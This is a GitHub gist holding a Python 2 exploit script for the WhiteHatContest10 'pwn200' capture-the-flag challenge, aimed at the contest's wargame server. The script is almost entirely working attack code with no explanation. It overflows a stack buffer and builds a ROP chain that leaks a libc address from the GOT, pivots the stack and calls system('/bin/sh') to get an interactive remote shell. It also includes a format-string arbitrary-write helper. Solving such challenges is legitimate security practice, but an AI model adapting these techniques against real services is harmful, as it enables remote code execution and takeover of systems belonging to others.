Skip to content

Instantly share code, notes, and snippets.

@hhc0null

hhc0null/exploit.py

Created July 25, 2015 04:23
Show Gist options
  • Save hhc0null/5959ac99aa27deef48d7 to your computer and use it in GitHub Desktop.
Save hhc0null/5959ac99aa27deef48d7 to your computer and use it in GitHub Desktop.
Download ZIP
WhiteHatContest10 pwn200
Raw
exploit.py
#!/usr/bin/env python2
import binascii
import re
import socket
import struct
import subprocess
import sys
import telnetlib
import time
def read_until(f, delim='\n'):
data = ""
while not data.endswith(delim):
data += f.read(1)
return data
def connect(rhp=("localhost", 10200)):
s = socket.create_connection(rhp)
f = s.makefile('rw', bufsize=0)
return s, f
def interact(s):
t = telnetlib.Telnet()
t.sock = s
print "[+] 4ll y0U n33D 15 5h3ll!!"
t.interact()
def p(x, t="<I"):
return struct.pack(t, x)
def u(x, t="<I"):
return struct.unpack(t, x)[0]
def unsigned(x):
return u(p(x, t="<i"), t="<I")
def overwrite(pairs, index=7):
(addrs, datas) = pairs
if len(addrs) != len(datas):
sys.stderr.write("[!] number of `pairs', elements don't be matched in overwrite()\n")
return ""
payload = ""
for addr in addrs:
# A, A+2, B, B+2, C, C+2, ...
payload += p(addr) + p(addr+2)
dataset = map(lambda x: [x&0xffff, (x>>16)&0xffff], datas)
dataset = sum(dataset, []) # it's a cool technique ;)
num = -len(payload)
prev = 0
for i, data in enumerate(dataset):
data += num
data = unsigned(data) if data < 0 else u(p(data, t="<H"), t="<H")
payload += "%{}x%{}$hn%{}x".format(data, index+i, (0x10000 - data + num) % 0x10000)
num = 0
return payload
def stack_leak(data, write=True):
data = data.replace('(nil)', '0x0')
data = data.split('0x')[1:]
stack = map(lambda x: int('0x'+x, 16), data)
if write:
print map(lambda x: "0x{:08x}".format(x), stack)
return stack
def message(message_type, message_body, value=None):
text = ""
if value:
text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value)
else:
text = "[{}] {}".format(message_type, message_body)
print text
rhp = ("lab33.wargame.whitehat.vn", 10200)
dummy_address = 0xcafebabe
STDIN_FILENO = 0
STDOUT_FILENO = 1
STDERR_FILENO = 2
# binary
pivot = 0x0804a038 + 0x408
got___libc_start_main = 0x804a020
plt_write = 0x080484e0
plt_read = 0x08048520
p4r = 0x0804876c #: pop ebx ; pop esi ; pop edi ; pop ebp ; ret ;
p3r = 0x0804876d #: pop esi ; pop edi ; pop ebp ; ret ;
p2r = 0x0804876e #: pop edi ; pop ebp ; ret ;
p1r = 0x0804876f #: pop ebp ; ret ;
lr = 0x080485a8 #: leave ; ret ;
# libc
if len(sys.argv) >= 2 and '-l' in sys.argv[1]:
offset___libc_start_main = 0x00018540 #T __libc_start_main
offset___libc_system = 0x0003ae00 #T __libc_system
offset__exit = 0x000b2984 #T _exit
offset_rodata_binsh = 0x15d290+0x9
s, f = connect()
else:
offset___libc_start_main = 0x00019970 #T __libc_start_main
offset___libc_system = 0x0003fcd0 #T __libc_system
offset__exit = 0x000b4aae #T _exit
offset_rodata_binsh = 0x15da80+4
s, f = connect(rhp)
payload = p(dummy_address)*(0x80/4)
payload += p(dummy_address)*(0x3)
payload += p(plt_write)
payload += p(p3r)
payload += p(STDOUT_FILENO)
payload += p(got___libc_start_main)
payload += p(0x4)
payload += p(plt_read)
payload += p(p3r)
payload += p(STDIN_FILENO)
payload += p(pivot)
payload += p(0x100)
payload += p(p1r)
payload += p(pivot-4)
payload += p(lr)
f.write(payload)
time.sleep(1)
print repr(f.read(payload.index('\0')))
libc_base = u(f.read(4)) - offset___libc_start_main
message('+', "libc_base", libc_base)
payload = p(libc_base+offset___libc_system)
payload += p(p1r)
payload += p(libc_base+offset_rodata_binsh)
payload += p(libc_base+offset__exit)
payload += p(0)
f.write(payload)
time.sleep(1)
interact(s)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment